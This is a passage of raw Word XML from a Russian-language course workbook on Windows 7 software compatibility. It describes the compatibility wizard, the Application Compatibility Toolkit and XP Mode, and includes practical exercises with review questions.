          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Помощник по совместимости программ: вопросы и ответы</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> на веб-сайте Windows Help and Support.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мастер совместимости программ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мастер совместимости программ из состава Windows 7 предназначен для разрешения проблем с приложениями, написанными для предыдущих версий Windows. Он позволяет указать для программы параметры совместимости, что часто устраняет неполадки.</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Чтобы запустить мастер совместимости программ, нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (пуск), щелкните </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Control Panel</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (панель управления), затем </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Programs</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (программы) и, наконец, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use an older program with this version of Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (использование старых программ с этой версией Windows). Подробнее см. </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Запуск старых программ в данной версии Windows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> на веб-сайте Windows Vista Help and Support.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Внимание!</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Не используйте мастер совместимости программ для старых антивирусных программ, дисковых служебных программ или других системных программ, так как это может привести к потере данных или создать угрозу безопасности. Вместо этого следует использовать только версии этих программ, специально разработанные для вашей версии операционной системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Набор средств для обеспечения совместимости приложений</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Корпорацией Майкрософт выпущен комплект инструментов и документации по управлению приложениями, используемыми в организации, а именно набор средств для обеспечения совместимости приложений (ACT) версии 5.5, который позволяет сократить затраты времени и ресурсов на разрешение проблем совместимости приложений и быстрее развернуть ОС Windows 7. Данный набор средств обеспечивает подготовку к внедрению Windows 7. Он позволяет вести подробный учет всех используемых программ, обеспечивает средства управления ими и позволяет установить, в какой именно части среда предприятия </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>потребует особого внимания при подготовке к развертыванию Windows 7. Набор был специально обновлен и теперь поддерживает компоненты безопасности ОС Windows 7.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="357" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С помощью набора средств для обеспечения совместимости программ можно:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="357" w:firstLine="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>проверить совместимость приложений с новой версии ОС Windows и службами Windows Update, а также провести оценку рисков;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="357" w:firstLine="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>вступить в сообщество ACT Community, представив другим пользователям свою оценку рисков;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="357" w:firstLine="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>протестировать веб-приложения и веб-сайты на совместимость с новыми выпусками и обновлениями безопасности обозревателя Internet Explorer.</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Подробнее об этом наборе средств см. </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Набор средств для обеспечения совместимости приложений (ACT) версии 5.5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Режим Windows XP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:spacing w:line="204" w:lineRule="atLeast"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если с помощью набора средств для обеспечения совместимости или иных инструментов не удается обеспечить нормальную работу приложения в ОС Windows 7, можно прибегнуть к иному варианту – </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>режиму Windows XP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Он позволяет устанавливать и без проблем запускать приложения Windows XP прямо из ОС Windows 7. При этом используется технология виртуализации Windows Virtual PC, создающая для приложения виртуальную среду Windows XP. После установки приложения оно запускается как обычно прямо с рабочего стола Windows 7. Пользователю даже не требуется знать, что на самом деле программа работает в виртуальной машине Windows XP. Режим Windows XP можно загрузить отдельно для редакций Professional (профессиональная), Ultimate (максимальная) и Enterprise (корпоративная) операционной системы Windows 7. Он представляет из себя 32-разрядную среду Windows XP Professional SP3, помещенную на виртуальный жесткий диск. Хотя этот режим и позволяет полностью решить любые проблемы совместимости, он также означает, что теперь операционных систем будет две, и вторая тоже требует настройки в соответствии с требуемым уровнем безопасности. По умолчанию виртуальная машина Windows XP настроена на использование общей сети, или NAT. Преимущество такого варианта в том, что незапрошенный сетевой трафик никогда не сможет попасть в виртуальную машину, но при этом меняется и способ, которым обозреватель Internet Explorer автоматически обнаруживает расположение веб-серверов. Работая в режиме Windows XP, Internet Explorer, обращаясь к веб-сайтам через NAT, может отнести ряд внешних веб-сайтов к зоне </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Интернет</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, поэтому необходимо ограничить параметры этой зоны до соответствия параметрам зоны </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ограниченные узлы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. После этого доверенные веб-сайты можно добавить в зону </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Надежные узлы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Чтобы начать использование режима Windows XP, загрузите его с веб-страницы </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Режим Windows XP и Windows Virtual PC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Подробнее о параметрах, которые позволяют усилить безопасность Windows XP, см. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Руководство по безопасности Windows XP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это руководство входит в состав </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>набора средств по управлению соответствием требованиям безопасности для Windows XP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidR="004653C4" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Запустить программу с помощью мастера совместимости с использованием дополнительных параметров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустить мастер совместимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выбрать программу для запуска с дополнительными параметрами</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выбрать дополнительные параметры запуска</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустить программу с помощью мастера совместимости</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся результаты работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Для чего используется администратор совместимости?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Как перенести настройки совместимости?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD6D41" w:rsidRPr="00617AC0" w:rsidRDefault="00DD6D41" w:rsidP="00DD6D41">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Как запустить администратор совместимости?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="0094432D">
      <w:pPr>
        <w:pStyle w:val="1100"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc507788515"/>
      <w:bookmarkStart w:id="25" w:name="_Toc26278721"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 2 Выбор методов выявления и устранения проблем совместимости программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> научить выбирать оптимальные методы для устранения проблем совместимости программного обеспечения отраслевой направленности при решении ситуационных задач.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Рассмотреть конфликтные ситуации, возникающие при установке приложений с операционными системами семейства </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Изучить методы решения проблем совместимости программного обеспечения с ОС </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся рекомендации по установке и примерный текст консультации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
